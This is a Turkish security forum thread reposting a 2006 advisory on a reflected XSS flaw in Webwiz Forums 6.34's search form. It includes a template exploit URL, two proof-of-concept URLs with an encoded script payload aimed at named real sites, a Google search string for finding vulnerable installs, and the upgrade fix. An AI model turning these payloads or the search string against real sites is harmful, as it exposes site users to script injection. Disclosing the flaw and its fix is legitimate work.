folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Webwiz Forums <= 6.34 (Search_Form.Asp) XSS (Çapraz Site Betiklemesi) Zayıflığı



Webwiz Forums <= 6.34 (Search_Form.Asp) XSS (Çapraz Site Betiklemesi) Zayıflığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nuker
    Nuker's avatar
    Kayıt Tarihi: 09/Ekim/2005
    Erkek

    --Güvenlik Raporu--
    Nedir:WebWiz forums <= 6.34 (search_form.asp) XSS (çapraz site betiklemesi) zayıflığı
    ---
    Tarih: 08/01/06 07:19 PM
    ---
    Kontaklar:{
    ICQ: 10072
    MSN/Email: [email]nukedx@nukedx.com[/email]
    Web: [url]http://www.nukedx.com[/url]
    }
    ---
    Hakkında: Bu metod aracılığıyla uzaktan saldıran birisi ilgili forumun kullanıcısının linke tıklamasıyla mevcut tarayıcıya XSS (çapraz site betiklemesi) saldırısında bulunabiliyor.
    ---
    Örnek & Nasıl:[url]http://[site]/[/url][webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
    ---
    Çözüm: Forum sürümünüzü 7.01 veya daha bir üst versiyona yükseltmeniz.
    ---
    Saygılar,
    NWPX team adına,
    nuker a.k.a nukedx


    Türkiye'den bir kaç site:
    [code]
    http://www.cyber-security.org/CW/Forum/search_form.asp?ReturnPage=Search&search=dasd%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
    http://www.bebek.com/EskiForum/search_form.asp?ReturnPage=Search&search=dasd%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1
    [/code]
    ve bir çok örneğini googleda
    allintext:"Copyright ©2001-2002 Web Wiz Guide" yazarak bulabilirsiniz.


    I wish you bear with me , stay near me a.k.a nukedx
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Rawkmetal
    Rawkmetal's avatar
    Kayıt Tarihi: 16/Şubat/2005
    Erkek

    hoca WebWiz forums 6.34 kullanan çok az site var pek kullanılmıo 7.6 sı varken =)


    saolsın emeğine sağlık ...


    dünya yan geldi. dalganıza bakın...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nuker
    Nuker's avatar
    Kayıt Tarihi: 09/Ekim/2005
    Erkek

    evet ama azýnsanacak bir sayýdada değil en iyi örneði LW ;))


    Raporun ingilizce hali ve referansları


    http://seclists.org/lists/fulldisclosure/2006/Jan/0304.html


    http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0299.html


    http://www.securityfocus.com/archive/1/421615/30/30/threaded


    I wish you bear with me , stay near me a.k.a nukedx
Toplam Hit: 12479 Toplam Mesaj: 3